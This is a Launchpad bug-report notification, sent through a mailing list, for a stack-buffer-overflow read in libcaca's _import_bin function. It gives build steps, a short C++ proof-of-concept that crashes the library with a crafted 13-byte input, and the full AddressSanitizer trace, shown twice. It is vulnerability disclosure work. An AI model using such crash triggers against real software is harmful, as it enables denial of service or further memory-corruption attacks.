** Description changed: Hello ubuntu security team + + issues:https://github.com/cacalabs/libcaca/issues/56 + System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 + libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; void crash(const uint8_t *Data, size_t Size) { - if(Size<8) return ; - size_t len=0; - caca_canvas_t *cv; - cv = caca_create_canvas(0,0); - caca_create_frame(cv,0); - caca_set_frame(cv,0); - caca_import_canvas_from_memory(cv,Data,Size,"bin"); - caca_free_canvas(cv); - cv=NULL; + if(Size<8) return ; + size_t len=0; + caca_canvas_t *cv; + cv = caca_create_canvas(0,0); + caca_create_frame(cv,0); + caca_set_frame(cv,0); + caca_import_canvas_from_memory(cv,Data,Size,"bin"); + caca_free_canvas(cv); + cv=NULL; } int main(int args,char* argv[]){ - size_t len = 0; - unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; - len = sizeof(buffer)/sizeof(unsigned char); - printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); - crash((const uint8_t*)buffer,len); - return 0; + size_t len = 0; + unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; + len = sizeof(buffer)/sizeof(unsigned char); + printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); + crash((const uint8_t*)buffer,len); + return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: ================================================================= ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 - #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 - #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 - #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 - #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) + #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 + #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 + #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 + #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 + #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame - #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 + #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 - This frame has 1 object(s): - [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable + This frame has 1 object(s): + [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork - (longjmp and C++ exceptions *are* supported) + (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: - 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 - 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): - Addressable: 00 - Partially addressable: 01 02 03 04 05 06 07 - Heap left redzone: fa - Freed heap region: fd - Stack left redzone: f1 - Stack mid redzone: f2 - Stack right redzone: f3 - Stack after return: f5 - Stack use after scope: f8 - Global redzone: f9 - Global init order: f6 - Poisoned by user: f7 - Container overflow: fc - Array cookie: ac - Intra object redzone: bb - ASan internal: fe - Left alloca redzone: ca - Right alloca redzone: cb - Shadow gap: cc + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc ==3817476==ABORTING Thanks
-- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925468 Title: stack-buffer-overflow of import.c in function _import_bin Status in libcaca package in Ubuntu: New Bug description: Hello ubuntu security team issues:https://github.com/cacalabs/libcaca/issues/56 System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"bin"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: ================================================================= ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3817476==ABORTING Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925468/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp